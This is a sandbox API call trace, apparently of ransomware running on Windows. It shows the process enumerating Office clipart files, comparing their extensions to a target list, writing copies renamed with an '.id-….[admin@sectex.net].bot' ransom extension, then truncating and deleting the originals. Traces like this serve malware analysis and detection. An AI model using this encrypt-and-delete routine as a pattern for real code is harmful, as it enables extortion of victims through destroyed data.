	[0158.473] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.473] SetEndOfFile (hFile=0x3c0) returned 1
	[0158.475] CloseHandle (hObject=0x3c0) returned 1
	[0158.475] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.476] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf")) returned 1
	[0158.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.476] lstrlenW (lpString=".doc") returned 4
	[0158.476] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.476] lstrlenW (lpString=".docx") returned 5
	[0158.477] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.477] lstrlenW (lpString=".pdf") returned 4
	[0158.477] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.477] lstrlenW (lpString=".xls") returned 4
	[0158.477] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.477] lstrlenW (lpString=".xlsx") returned 5
	[0158.477] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.477] lstrlenW (lpString=".ppt") returned 4
	[0158.477] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.477] lstrlenW (lpString=".zip") returned 4
	[0158.477] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.477] lstrlenW (lpString=".rar") returned 4
	[0158.477] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.477] lstrlenW (lpString=".bz2") returned 4
	[0158.477] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.477] lstrlenW (lpString=".7z") returned 3
	[0158.477] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.477] lstrlenW (lpString=".dbf") returned 4
	[0158.477] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.477] lstrlenW (lpString=".1cd") returned 4
	[0158.477] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.477] lstrlenW (lpString=".jpg") returned 4
	[0158.477] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.477] lstrlenW (lpString=".doc") returned 4
	[0158.477] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.478] lstrlenW (lpString=".docx") returned 5
	[0158.478] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.478] lstrlenW (lpString=".pdf") returned 4
	[0158.478] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.478] lstrlenW (lpString=".xls") returned 4
	[0158.478] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.478] lstrlenW (lpString=".xlsx") returned 5
	[0158.478] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.478] lstrlenW (lpString=".ppt") returned 4
	[0158.478] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.478] lstrlenW (lpString=".zip") returned 4
	[0158.478] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.478] lstrlenW (lpString=".rar") returned 4
	[0158.478] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.478] lstrlenW (lpString=".bz2") returned 4
	[0158.478] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.478] lstrlenW (lpString=".7z") returned 3
	[0158.478] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.478] lstrlenW (lpString=".dbf") returned 4
	[0158.478] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.478] lstrlenW (lpString=".1cd") returned 4
	[0158.478] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 63
	[0158.478] lstrlenW (lpString=".jpg") returned 4
	[0158.478] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.479] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.479] lstrlenW (lpString="J0105338.WMF") returned 12
	[0158.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0158.479] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=11584) returned 1
	[0158.479] CloseHandle (hObject=0x3c0) returned 1
	[0158.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf")) returned 0x20
	[0158.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0158.480] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.480] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0158.480] GetLastError () returned 0x0
	[0158.480] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2d40, lpOverlapped=0x0) returned 1
	[0158.544] WriteFile (in: hFile=0x3e8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2d50, lpOverlapped=0x0) returned 1
	[0158.545] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.545] WriteFile (in: hFile=0x3e8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.545] SetEndOfFile (hFile=0x3e8) returned 1
	[0158.545] CloseHandle (hObject=0x3e8) returned 1
	[0158.545] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.545] SetEndOfFile (hFile=0x3c0) returned 1
	[0158.548] CloseHandle (hObject=0x3c0) returned 1
	[0158.548] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.602] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf")) returned 1
	[0158.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.603] lstrlenW (lpString=".doc") returned 4
	[0158.603] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.603] lstrlenW (lpString=".docx") returned 5
	[0158.603] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.603] lstrlenW (lpString=".pdf") returned 4
	[0158.603] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.603] lstrlenW (lpString=".xls") returned 4
	[0158.603] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.603] lstrlenW (lpString=".xlsx") returned 5
	[0158.603] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.603] lstrlenW (lpString=".ppt") returned 4
	[0158.603] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.603] lstrlenW (lpString=".zip") returned 4
	[0158.603] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.603] lstrlenW (lpString=".rar") returned 4
	[0158.603] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.603] lstrlenW (lpString=".bz2") returned 4
	[0158.603] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.603] lstrlenW (lpString=".7z") returned 3
	[0158.603] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.603] lstrlenW (lpString=".dbf") returned 4
	[0158.603] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.603] lstrlenW (lpString=".1cd") returned 4
	[0158.604] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.604] lstrlenW (lpString=".jpg") returned 4
	[0158.604] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.604] lstrlenW (lpString=".doc") returned 4
	[0158.604] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.604] lstrlenW (lpString=".docx") returned 5
	[0158.604] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.604] lstrlenW (lpString=".pdf") returned 4
	[0158.604] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.604] lstrlenW (lpString=".xls") returned 4
	[0158.604] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.604] lstrlenW (lpString=".xlsx") returned 5
	[0158.604] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.604] lstrlenW (lpString=".ppt") returned 4
	[0158.604] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.604] lstrlenW (lpString=".zip") returned 4
	[0158.604] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.604] lstrlenW (lpString=".rar") returned 4
	[0158.604] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.604] lstrlenW (lpString=".bz2") returned 4
	[0158.604] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.604] lstrlenW (lpString=".7z") returned 3
	[0158.604] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.604] lstrlenW (lpString=".dbf") returned 4
	[0158.604] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.604] lstrlenW (lpString=".1cd") returned 4
	[0158.605] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63
	[0158.605] lstrlenW (lpString=".jpg") returned 4
	[0158.605] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.605] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.605] lstrlenW (lpString="J0105380.WMF") returned 12
	[0158.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105380.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0158.605] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=4624) returned 1
	[0158.605] CloseHandle (hObject=0x3d0) returned 1
	[0158.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105380.wmf")) returned 0x20
	[0158.606] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105380.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105380.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0158.606] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.606] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105380.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0158.607] GetLastError () returned 0x0
	[0158.607] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1210, lpOverlapped=0x0) returned 1
	[0158.655] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1220, lpOverlapped=0x0) returned 1
	[0158.656] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.656] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.656] SetEndOfFile (hFile=0x398) returned 1
	[0158.656] CloseHandle (hObject=0x398) returned 1
	[0158.656] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.656] SetEndOfFile (hFile=0x3d0) returned 1
	[0158.662] CloseHandle (hObject=0x3d0) returned 1
	[0158.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.662] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105380.wmf")) returned 1
	[0158.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.663] lstrlenW (lpString=".doc") returned 4
	[0158.663] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.663] lstrlenW (lpString=".docx") returned 5
	[0158.663] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0158.663] lstrlenW (lpString=".pdf") returned 4
	[0158.663] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.663] lstrlenW (lpString=".xls") returned 4
	[0158.663] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.663] lstrlenW (lpString=".xlsx") returned 5
	[0158.663] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0158.663] lstrlenW (lpString=".ppt") returned 4
	[0158.663] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.663] lstrlenW (lpString=".zip") returned 4
	[0158.663] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.663] lstrlenW (lpString=".rar") returned 4
	[0158.663] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.663] lstrlenW (lpString=".bz2") returned 4
	[0158.663] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.663] lstrlenW (lpString=".7z") returned 3
	[0158.663] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.664] lstrlenW (lpString=".dbf") returned 4
	[0158.664] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.664] lstrlenW (lpString=".1cd") returned 4
	[0158.664] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.664] lstrlenW (lpString=".jpg") returned 4
	[0158.664] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.664] lstrlenW (lpString=".doc") returned 4
	[0158.664] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.664] lstrlenW (lpString=".docx") returned 5
	[0158.664] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0158.664] lstrlenW (lpString=".pdf") returned 4
	[0158.664] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.664] lstrlenW (lpString=".xls") returned 4
	[0158.664] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.664] lstrlenW (lpString=".xlsx") returned 5
	[0158.664] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0158.664] lstrlenW (lpString=".ppt") returned 4
	[0158.664] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.664] lstrlenW (lpString=".zip") returned 4
	[0158.664] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.664] lstrlenW (lpString=".rar") returned 4
	[0158.664] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.664] lstrlenW (lpString=".bz2") returned 4
	[0158.664] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.665] lstrlenW (lpString=".7z") returned 3
	[0158.665] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.665] lstrlenW (lpString=".dbf") returned 4
	[0158.665] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.665] lstrlenW (lpString=".1cd") returned 4
	[0158.665] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 63
	[0158.665] lstrlenW (lpString=".jpg") returned 4
	[0158.665] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.665] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.665] lstrlenW (lpString="J0105386.WMF") returned 12
	[0158.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105386.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0158.666] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5980) returned 1
	[0158.666] CloseHandle (hObject=0x3d0) returned 1
	[0158.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105386.wmf")) returned 0x20
	[0158.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105386.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105386.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0158.666] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.666] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105386.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0158.667] GetLastError () returned 0x0
	[0158.667] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x175c, lpOverlapped=0x0) returned 1
	[0158.680] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1760, lpOverlapped=0x0) returned 1
	[0158.680] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.681] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.681] SetEndOfFile (hFile=0x398) returned 1
	[0158.681] CloseHandle (hObject=0x398) returned 1
	[0158.681] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.681] SetEndOfFile (hFile=0x3d0) returned 1
	[0158.683] CloseHandle (hObject=0x3d0) returned 1
